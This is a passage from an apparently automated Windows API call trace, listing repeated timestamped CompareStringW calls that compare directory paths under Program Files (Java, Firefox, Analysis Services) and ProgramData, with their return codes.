(x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount2=48) returned 1 [0139.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount2=48) returned 2 [0139.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 3 [0139.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\", cchCount1=40, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 1 [0139.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\", cchCount1=40, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 1 [0139.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 1 [0139.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount2=48) returned 1 [0139.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount2=48) returned 1 [0139.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount2=48) returned 1 [0139.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\", cchCount2=33) returned 3 [0139.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\", cchCount2=33) returned 3 [0139.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\", cchCount1=40, lpString2="C:\\Program Files (x86)\\Java\\jre7\\", cchCount2=33) returned 3 [0139.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount2=74) returned 1 [0139.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount2=74) returned 1 [0139.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount2=74) returned 1 [0139.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount2=74) returned 1 [0139.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\", cchCount2=97) returned 1 [0139.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\", cchCount2=97) returned 1 [0139.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\", cchCount2=97) returned 1 [0139.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount1=74, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\", cchCount2=97) returned 1 [0139.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\", cchCount2=52) returned 1 [0139.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\", cchCount2=52) returned 1 [0139.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount1=74, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\", cchCount2=52) returned 1 [0139.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\", cchCount2=52) returned 1 [0139.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 1 [0139.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount1=74, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 1 [0139.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0139.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 1 [0139.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount1=74, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 1 [0139.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0139.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0139.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 1 [0139.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount1=74, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 1 [0139.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\", cchCount1=97, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 1 [0139.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\", cchCount1=52, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 1 [0139.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 1 [0139.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 1 [0139.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\", cchCount1=52, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 1 [0139.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Microsoft Help\\", cchCount1=30, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 2 [0139.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount2=48) returned 2 [0139.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount2=48) returned 2 [0139.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 3 [0139.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 2 [0139.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 1 [0139.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 1 [0139.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount2=51) returned 3 [0139.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount2=51) returned 1 [0139.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount2=51) returned 3 [0139.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount2=51) returned 1 [0139.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 1 [0139.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 1 [0139.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\", cchCount1=52, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 1 [0139.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Microsoft Help\\", cchCount1=30, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 2 [0139.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 1 [0139.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 1 [0139.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\", cchCount1=52, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 1 [0139.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Microsoft Help\\", cchCount1=30, lpString2="C:\\ProgramData\\Microsoft Help\\", cchCount2=30) returned 2 [0139.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 3 [0139.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 3 [0139.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\", cchCount1=40, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 1 [0139.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 2 [0139.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 3 [0139.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 3 [0139.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\", cchCount1=40, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 1 [0139.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 2 [0139.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 3 [0139.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 3 [0139.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\", cchCount1=40, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 1 [0139.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 2 [0139.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount2=48) returned 1 [0139.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount2=48) returned 3 [0139.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount2=48) returned 2 [0139.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 3 [0139.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 3 [0139.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\", cchCount1=40, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 1 [0139.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\", cchCount2=47) returned 2 [0139.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount2=58) returned 3 [0139.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount2=58) returned 1 [0139.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount2=58) returned 3 [0139.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount2=58) returned 3 [0139.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount2=58) returned 3 [0139.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount2=58) returned 1 [0139.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount2=58) returned 3 [0139.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\", cchCount2=58) returned 2 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.162] CompareStringW 